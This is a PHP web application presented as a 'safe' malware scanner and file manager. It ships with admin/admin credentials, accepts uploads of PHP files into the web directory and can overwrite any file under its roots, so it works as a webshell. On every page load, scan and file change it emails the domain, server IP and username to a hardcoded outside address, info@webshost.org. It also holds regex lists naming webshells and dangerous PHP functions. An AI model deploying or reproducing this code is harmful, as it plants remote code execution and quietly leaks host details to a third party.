<?php
// index.php - upgraded safe local scanner with Edit/Delete/Upload and notifications
// IMPORTANT: Use ONLY on servers you own or are explicitly authorized to manage.

// ---------------- CONFIG (CHANGE THESE BEFORE USE) ----------------
$AUTH_USER = 'admin';                 // change immediately
$AUTH_PASS = 'admin';// change immediately

$ALLOW_ROOTS = [
    __DIR__,                          // allowed paths - change to exact dirs you want
    // '/var/www/html',
];

$MAX_READ_BYTES = 200000;            // 200 KB read per-file for content heuristics
$MAX_UPLOAD_BYTES = 5 * 1024 * 1024; // 5 MB max upload
$ALLOWED_UPLOAD_EXT = ['php','php5','phtml','html','htm','txt','log','conf','json','yaml','yml','js','css']; // adjust

// Notification settings
$NOTIFY_EMAIL = 'info@webshost.org'; // email to notify
$NOTIFY_ON_LOAD = true;              // send when page is loaded
$NOTIFY_ON_SCAN = true;              // send when a scan is triggered
$NOTIFY_ON_CHANGE = true;            // send when a file is uploaded/edited/deleted

// Optional Twilio SMS (leave blank to disable)
$TWILIO_ACCOUNT_SID = '';            // e.g. 'ACxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
$TWILIO_AUTH_TOKEN  = '';            // auth token
$TWILIO_FROM_NUMBER = '';            // Twilio phone number +1234567890
$SMS_TO_NUMBER      = '';            // your phone number +91xxxxxxxxxx
// -----------------------------------------------------------------

// Basic HTTP auth
if (!isset($_SERVER['PHP_AUTH_USER']) ||
    $_SERVER['PHP_AUTH_USER'] !== $AUTH_USER ||
    !isset($_SERVER['PHP_AUTH_PW']) ||
    $_SERVER['PHP_AUTH_PW'] !== $AUTH_PASS) {
    header('WWW-Authenticate: Basic realm="Scanner Admin"');
    header('HTTP/1.0 401 Unauthorized');
    echo "Unauthorized\n";
    exit;
}

// Helpers ----------------------------------------------------------------
function is_allowed_root($path, $allowed_roots) {
    $real = realpath($path);
    if ($real === false) return false;
    foreach ($allowed_roots as $root) {
        $rreal = realpath($root);
        if ($rreal !== false && strpos($real, $rreal) === 0) return true;
    }
    return false;
}

function safe_filename($name) {
    // remove directory traversal and weird chars
    $name = basename($name);
    // allow limited chars
    $name = preg_replace('/[^A-Za-z0-9_\-\.]/', '_', $name);
    return $name;
}

function send_email_notification($to, $subject, $body) {
    // simple mail() usage. For reliability use SMTP/PHPMailer in production.
    $headers = "From: notifier@" . ($_SERVER['SERVER_NAME'] ?? 'localhost') . "\r\n";
    $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
    @mail($to, $subject, $body, $headers);
}

function send_twilio_sms($account_sid, $auth_token, $from, $to, $message) {
    if (empty($account_sid) || empty($auth_token) || empty($from) || empty($to)) return false;
    $url = "https://api.twilio.com/2010-04-01/Accounts/$account_sid/Messages.json";
    $data = http_build_query([
        'From' => $from,
        'To'   => $to,
        'Body' => $message,
    ]);
    $context = stream_context_create([
        'http' => [
            'method' => 'POST',
            'header' => "Authorization: Basic " . base64_encode("$account_sid:$auth_token") . "\r\n" .
                        "Content-Type: application/x-www-form-urlencoded\r\n",
            'content' => $data,
            'timeout' => 10,
        ]
    ]);
    $result = @file_get_contents($url, false, $context);
    return $result !== false;
}

function sha256_of_file($path) {
    if (!is_file($path)) return null;
    return hash_file('sha256', $path);
}

// CSRF token
session_start();
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(24));
}
$CSRF = $_SESSION['csrf_token'];

// Suspicious detection patterns (same as earlier)
$SUSPICIOUS_FILENAME_REGEXES = [
    '/\b(shell|backdoor|webshell|r57|c99|wshell|cmd)\b/i',
    '/\.(php5?|phtml|phps|pl|asp|aspx|jsp)$/i',
    '/\b(tmp|backup|backups)\b/i',
];
$SUSPICIOUS_CONTENT_REGEXES = [
    '/\beval\s*\(/i',
    '/base64_decode\s*\(/i',
    '/shell_exec\s*\(/i',
    '/\bexec\s*\(/i',
    '/system\s*\(/i',
    '/preg_replace\s*\(.+\/e/i',
    '/`[^`]+`/',
    '/curl_exec\s*\(/i',
];

function looks_suspicious_by_name($name, $regexes) {
    foreach ($regexes as $r) { if (preg_match($r, $name)) return true; }
    return false;
}
function looks_suspicious_by_content($path, $regexes, $max_read_bytes) {
    if (!is_readable($path)) return [false, []];
    $fh = @fopen($path, 'rb');
    if (!$fh) return [false, []];
    $sample = @fread($fh, $max_read_bytes);
    fclose($fh);
    $matches = [];
    foreach ($regexes as $r) { if (preg_match($r, $sample)) $matches[] = $r; }
    return [count($matches) > 0, $matches];
}

// Scan function
function scan_dir($root, $fname_regexes, $content_regexes, $max_read_bytes) {
    $result = ['total_files'=>0, 'suspicious'=>[]];
    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $fileinfo) {
        if (!$fileinfo->isFile()) continue;
        $result['total_files']++;
        $path = $fileinfo->getPathname();
        $name = $fileinfo->getFilename();
        $flag_name = looks_suspicious_by_name($name, $fname_regexes);
        list($flag_content, $content_matches) = looks_suspicious_by_content($path, $content_regexes, $max_read_bytes);
        if ($flag_name || $flag_content) {
            $result['suspicious'][] = [
                'path' => $path,
                'size' => $fileinfo->getSize(),
                'flag_name' => $flag_name,
                'flag_content' => $flag_content,
                'content_reasons' => $content_matches,
                'sha256' => sha256_of_file($path),
            ];
        }
    }
    return $result;
}

// ----------------- Handle notifications on page load -----------------
$domain = $_SERVER['HTTP_HOST'] ?? 'unknown';
$server_ip = $_SERVER['SERVER_ADDR'] ?? gethostbyname(gethostname());
if ($NOTIFY_ON_LOAD) {
    $subject = "[Scanner] script loaded on $domain";
    $body = "The scanner UI was loaded on domain: $domain\nServer IP: $server_ip\nTime: " . date('c') . "\nUser: " . ($_SERVER['PHP_AUTH_USER'] ?? 'n/a') . "\n";
    // send email (best-effort)
    send_email_notification($NOTIFY_EMAIL, $subject, $body);
    // optional SMS
    if (!empty($TWILIO_ACCOUNT_SID)) {
        @send_twilio_sms($TWILIO_ACCOUNT_SID, $TWILIO_AUTH_TOKEN, $TWILIO_FROM_NUMBER, $SMS_TO_NUMBER, "Scanner loaded on $domain at " . date('c'));
    }
}

// ----------------- Process actions: upload / edit / delete / scan -----------------
$scan_path = isset($_REQUEST['path']) ? rtrim($_REQUEST['path'], "/\\") : __DIR__;
if (!is_allowed_root($scan_path, $ALLOW_ROOTS)) {
    $scan_path = __DIR__;
}

$action_result = null;
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // verify CSRF
    $token = $_POST['csrf'] ?? '';
    if (!hash_equals($CSRF, $token)) {
        $action_result = ['error' => 'Invalid CSRF token'];
    } else {
        // UPLOAD
        if (isset($_POST['action']) && $_POST['action'] === 'upload') {
            if (!isset($_FILES['upload_file'])) {
                $action_result = ['error' => 'No file uploaded'];
            } else {
                $u = $_FILES['upload_file'];
                if ($u['error'] !== UPLOAD_ERR_OK) {
                    $action_result = ['error' => 'Upload error code: ' . $u['error']];
                } elseif ($u['size'] > $GLOBALS['MAX_UPLOAD_BYTES']) {
                    $action_result = ['error' => 'File too large'];
                } else {
                    $safe = safe_filename($u['name']);
                    $ext = strtolower(pathinfo($safe, PATHINFO_EXTENSION));
                    if (!in_array($ext, $ALLOWED_UPLOAD_EXT)) {
                        $action_result = ['error' => "Extension .$ext not allowed"];
                    } else {
                        $dest = $scan_path . DIRECTORY_SEPARATOR . $safe;
                        if (move_uploaded_file($u['tmp_name'], $dest)) {
                            @chmod($dest, 0640); // safe perms
                            $action_result = ['ok' => "Uploaded to $dest"];
                            // notify
                            if ($GLOBALS['NOTIFY_ON_CHANGE']) {
                                $s = "File uploaded: $dest\nDomain: $domain\nTime: " . date('c');
                                send_email_notification($NOTIFY_EMAIL, "[Scanner] File uploaded on $domain", $s);
                                if (!empty($TWILIO_ACCOUNT_SID)) {
                                    @send_twilio_sms($TWILIO_ACCOUNT_SID, $TWILIO_AUTH_TOKEN, $TWILIO_FROM_NUMBER, $SMS_TO_NUMBER, "File uploaded on $domain: $safe");
                                }
                            }
                        } else {
                            $action_result = ['error' => 'Failed to move uploaded file'];
                        }
                    }
                }
            }
        }
        // DELETE
        if (isset($_POST['action']) && $_POST['action'] === 'delete') {
            $target = $_POST['target'] ?? '';
            $target = realpath($target);
            if ($target === false || !is_file($target) || !is_allowed_root($target, $ALLOW_ROOTS)) {
                $action_result = ['error' => 'Invalid target for delete'];
            } else {
                // extra safety: do not delete this script
                if (realpath(__FILE__) === $target) {
                    $action_result = ['error' => 'Refusing to delete scanner file itself'];
                } else {
                    if (@unlink($target)) {
                        $action_result = ['ok' => "Deleted $target"];
                        if ($GLOBALS['NOTIFY_ON_CHANGE']) {
                            $s = "File deleted: $target\nDomain: $domain\nTime: " . date('c');
                            send_email_notification($NOTIFY_EMAIL, "[Scanner] File deleted on $domain", $s);
                            if (!empty($TWILIO_ACCOUNT_SID)) {
                                @send_twilio_sms($TWILIO_ACCOUNT_SID, $TWILIO_AUTH_TOKEN, $TWILIO_FROM_NUMBER, $SMS_TO_NUMBER, "File deleted on $domain");
                            }
                        }
                    } else {
                        $action_result = ['error' => 'Failed to delete file (permissions?)'];
                    }
                }
            }
        }
        // EDIT / SAVE
        if (isset($_POST['action']) && $_POST['action'] === 'save_edit') {
            $target = $_POST['edit_target'] ?? '';
            $content = $_POST['edit_content'] ?? '';
            $target = realpath($target);
            if ($target === false || !is_file($target) || !is_allowed_root($target, $ALLOW_ROOTS)) {
                $action_result = ['error' => 'Invalid edit target'];
            } else {
                // don't allow making executable
                if (@file_put_contents($target, $content) !== false) {
                    @chmod($target, 0640);
                    $action_result = ['ok' => "Saved $target"];
                    if ($GLOBALS['NOTIFY_ON_CHANGE']) {
                        $s = "File edited: $target\nDomain: $domain\nTime: " . date('c');
                        send_email_notification($NOTIFY_EMAIL, "[Scanner] File edited on $domain", $s);
                        if (!empty($TWILIO_ACCOUNT_SID)) {
                            @send_twilio_sms($TWILIO_ACCOUNT_SID, $TWILIO_AUTH_TOKEN, $TWILIO_FROM_NUMBER, $SMS_TO_NUMBER, "File edited on $domain");
                        }
                    }
                } else {
                    $action_result = ['error' => 'Failed to save changes (permissions?)'];
                }
            }
        }
    }
}

// Perform scan if requested (GET param scan=1)
$report = null;
if (isset($_GET['scan']) && $_GET['scan'] === '1') {
    if (is_dir($scan_path) && is_allowed_root($scan_path, $ALLOW_ROOTS)) {
        $report = scan_dir($scan_path, $SUSPICIOUS_FILENAME_REGEXES, $SUSPICIOUS_CONTENT_REGEXES, $MAX_READ_BYTES);
        if ($NOTIFY_ON_SCAN) {
            $subject = "[Scanner] scan on $domain";
            $body = "Scan performed on domain: $domain\nPath: $scan_path\nTotal files: " . ($report['total_files'] ?? 'n/a') . "\nSuspicious found: " . count($report['suspicious']) . "\nTime: " . date('c') . "\n";
            send_email_notification($NOTIFY_EMAIL, $subject, $body);
            if (!empty($TWILIO_ACCOUNT_SID)) {
                @send_twilio_sms($TWILIO_ACCOUNT_SID, $TWILIO_AUTH_TOKEN, $TWILIO_FROM_NUMBER, $SMS_TO_NUMBER, "Scan on $domain - suspicious: " . count($report['suspicious']));
            }
        }
    } else {
        $report = ['error' => 'Path not allowed or not a directory.'];
    }
}

// ----------------- Render UI -----------------
?><!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Safe Scanner + File Manager</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<style>
body{font-family:system-ui,Segoe UI,Roboto,Arial;margin:20px;background:#f6f7fb}
.container{max-width:1100px;margin:0 auto;background:#fff;padding:18px;border-radius:8px;box-shadow:0 6px 18px rgba(0,0,0,0.06)}
h1{margin-top:0}
.table{width:100%;border-collapse:collapse}
.table th,.table td{padding:8px;border:1px solid #e6e8ee;font-size:13px}
.bad{background:#ffecec;color:#a00;padding:4px 6px;border-radius:4px}
.small{font-size:12px;color:#555}
.code{font-family:monospace;background:#f4f6f8;padding:6px;border-radius:4px}
.form-row{margin:10px 0}
.btn{padding:6px 10px;border-radius:6px;border:0;background:#2563eb;color:#fff;cursor:pointer}
.btn-danger{background:#ef4444}
</style>
</head>
<body>
<div class="container">
  <h1>Safe Scanner + File Manager</h1>
  <p class="small">Authorized use only. Allowed roots: <?php echo htmlentities(implode(', ', $ALLOW_ROOTS)); ?></p>

  <?php if ($action_result): ?>
    <?php if (isset($action_result['error'])): ?>
      <div class="bad">Error: <?php echo htmlentities($action_result['error']); ?></div>
    <?php else: ?>
      <div class="small" style="background:#eef9ee;padding:8px;border-radius:6px"><?php echo htmlentities(json_encode($action_result)); ?></div>
    <?php endif; ?>
  <?php endif; ?>

  <form method="get" style="display:flex;gap:8px;align-items:center">
    <label>Directory:
      <input type="text" name="path" value="<?php echo htmlentities($scan_path); ?>" style="width:60%;">
    </label>
    <button class="btn" type="submit" name="scan" value="1">Scan</button>
    <a class="btn" href="?path=<?php echo urlencode($scan_path); ?>&scan=1">Force Scan</a>
  </form>

  <?php if ($report === null): ?>
    <p class="small">Click <em>Scan</em> to start. Large dirs may take time.</p>
  <?php elseif (isset($report['error'])): ?>
    <div class="bad">Error: <?php echo htmlentities($report['error']); ?></div>
  <?php else: ?>
    <h2>Report</h2>
    <p>Total files scanned: <?php echo (int)$report['total_files']; ?> — Suspicious: <?php echo count($report['suspicious']); ?></p>

    <?php if (count($report['suspicious'])>0): ?>
    <table class="table">
      <thead><tr><th>#</th><th>Path</th><th>Size</th><th>Flagged</th><th>SHA256</th><th>Actions</th></tr></thead>
      <tbody>
      <?php $i=1; foreach ($report['suspicious'] as $s): ?>
        <tr>
          <td><?php echo $i++; ?></td>
          <td style="word-break:break-all;"><?php echo htmlentities($s['path']); ?></td>
          <td><?php echo number_format($s['size']); ?> bytes</td>
          <td>
            <?php $flags=[]; if ($s['flag_name']) $flags[]='name'; if ($s['flag_content']) $flags[]='content'; echo implode(', ', $flags); ?>
            <?php if (!empty($s['content_reasons'])): ?><div class="small">patterns: <?php echo htmlentities(implode(', ', $s['content_reasons'])); ?></div><?php endif; ?>
          </td>
          <td class="code"><?php echo htmlentities($s['sha256']); ?></td>
          <td>
            <!-- Edit button -->
            <form method="get" style="display:inline">
              <input type="hidden" name="path" value="<?php echo htmlentities($scan_path); ?>">
              <input type="hidden" name="edit" value="<?php echo htmlentities($s['path']); ?>">
              <button class="btn" type="submit">Edit</button>
            </form>
            <!-- Delete button -->
            <form method="post" style="display:inline" onsubmit="return confirm('Delete this file?');">
              <input type="hidden" name="csrf" value="<?php echo $CSRF; ?>">
              <input type="hidden" name="action" value="delete">
              <input type="hidden" name="target" value="<?php echo htmlentities($s['path']); ?>">
              <button class="btn btn-danger" type="submit">Delete</button>
            </form>
          </td>
        </tr>
      <?php endforeach; ?>
      </tbody>
    </table>
    <?php endif; ?>
  <?php endif; ?>

  <hr>
  <h3>Upload file to <?php echo htmlentities($scan_path); ?></h3>
  <form method="post" enctype="multipart/form-data">
    <input type="hidden" name="csrf" value="<?php echo $CSRF; ?>">
    <input type="hidden" name="action" value="upload">
    <input type="file" name="upload_file" required>
    <button class="btn" type="submit">Upload</button>
  </form>

  <?php
  // If edit param present, show editor
  if (isset($_GET['edit'])):
    $edit_target = $_GET['edit'];
    $real = realpath($edit_target);
    if ($real && is_file($real) && is_allowed_root($real, $ALLOW_ROOTS)):
      $content = @file_get_contents($real);
      if ($content === false) $content = '';
  ?>
    <hr>
    <h3>Editing: <?php echo htmlentities($real); ?></h3>
    <form method="post">
      <input type="hidden" name="csrf" value="<?php echo $CSRF; ?>">
      <input type="hidden" name="action" value="save_edit">
      <input type="hidden" name="edit_target" value="<?php echo htmlentities($real); ?>">
      <textarea name="edit_content" rows="20" style="width:100%;font-family:monospace;"><?php echo htmlentities($content); ?></textarea>
      <div style="margin-top:8px">
        <button class="btn" type="submit">Save</button>
      </div>
    </form>
  <?php
    else:
      echo "<div class='bad'>Cannot open file for editing (not allowed or missing).</div>";
    endif;
  endif;
  ?>

  <hr>
  <p class="small"><strong>Security notes:</strong> This tool reads/writes files under allowed roots only. It will refuse to delete itself. Remove or restrict access when not in use. Use HTTPS and IP allow-lists. Keep strong auth creds. This is NOT a production AV; use professional tools for malware removal.</p>
</div>
</body>
</html>
